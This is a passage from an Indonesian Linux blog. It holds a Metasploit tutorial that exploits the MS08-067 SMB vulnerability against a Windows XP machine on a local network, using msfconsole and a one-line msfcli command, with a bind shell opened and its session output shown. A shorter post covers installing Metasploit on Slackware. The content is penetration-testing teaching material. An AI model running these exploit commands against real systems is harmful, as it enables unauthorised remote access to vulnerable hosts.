    ===================
    Name Description
    ---- -----------
    generic/debug_trap Generic x86 Debug Trap
    generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
    generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
    generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
    ----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.28 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Payload options (windows/shell_bind_tcp):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.1.28 no The target address
    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

sekarang jalankan exploit :

    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254

    C:\WINDOWS\system32>

Dan ternyata emang masih bolong… :p

Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.

    bash-4.1$ msfcli –help
    [*] Please wait while we load the module tree...
    Error: Invalid module: --help
    Usage: /usr/local/bin/msfcli [mode]
    =================================================================
    Mode Description
    ---- -----------
    (H)elp You're looking at it baby!
    (S)ummary Show information about this module
    (O)ptions Show available options for this module
    (A)dvanced Show available advanced options for this module
    (I)DS Evasion Show available ids evasion options for this module
    (P)ayloads Show available payloads for this module
    (T)argets Show available targets for this exploit module
    (AC)tions Show available actions for this auxiliary module
    (C)heck Run the check routine of the selected module
    (E)xecute Execute the selected module

So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:

    IP Addr Target : 192.168.1.28
    Port target : 445
    Exploit : windows/smb/ms08_067_netapi
    Payload : windows/shell_bind_tcp
    Exploit target : 0

Dan implementasinya menjadi seperti ini :

    bash$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>
Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.

Sumber : http://www.masrony.com/2009/03/metasploit-i-teknik-dasar/
Read more ...

Rabu, 25 Agustus 2010

Instalasi Metasploit Framework On SLACKWARE

Apa itu

Metasploit Framework ?

Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler.

Terdiri dari apa saja?

Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload.

Download

Saat ini tersedia dalam versi 3.4.3. Dapat didownload di Sini

Instalasi

Proses penginstalan tidak begitu sulit, ada baiknya Anda mendownload dengan perintah wget di consule :)

# wget http://www.metasploit.com/releases/framework-3.4.1-linux-i686.run

Setelah proses download sudah selesai, saatnya kita pasang di slackware kesayangan kita

# ./framework-3.4.1-linux-i686.run

ikuti prosesnya sampai selesai, dan jalankan dengan perintah

# msfconsole --> untuk mode consule
# msfweb --> untuk mode web

Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan Ctrl-C. Buka browser dan ketik di url http://127.0.0.1:55555/

Read more ...
Diberdayakan oleh Blogger.
 

Comment


ShoutMix chat widget

Cari Blog Ini

Google Search

Top Friends


GILA LINUX | Template Ireng Manis © 2010 Free Blogger Template Ajah for DheTemplate.com - New Free Blogger Template Everyday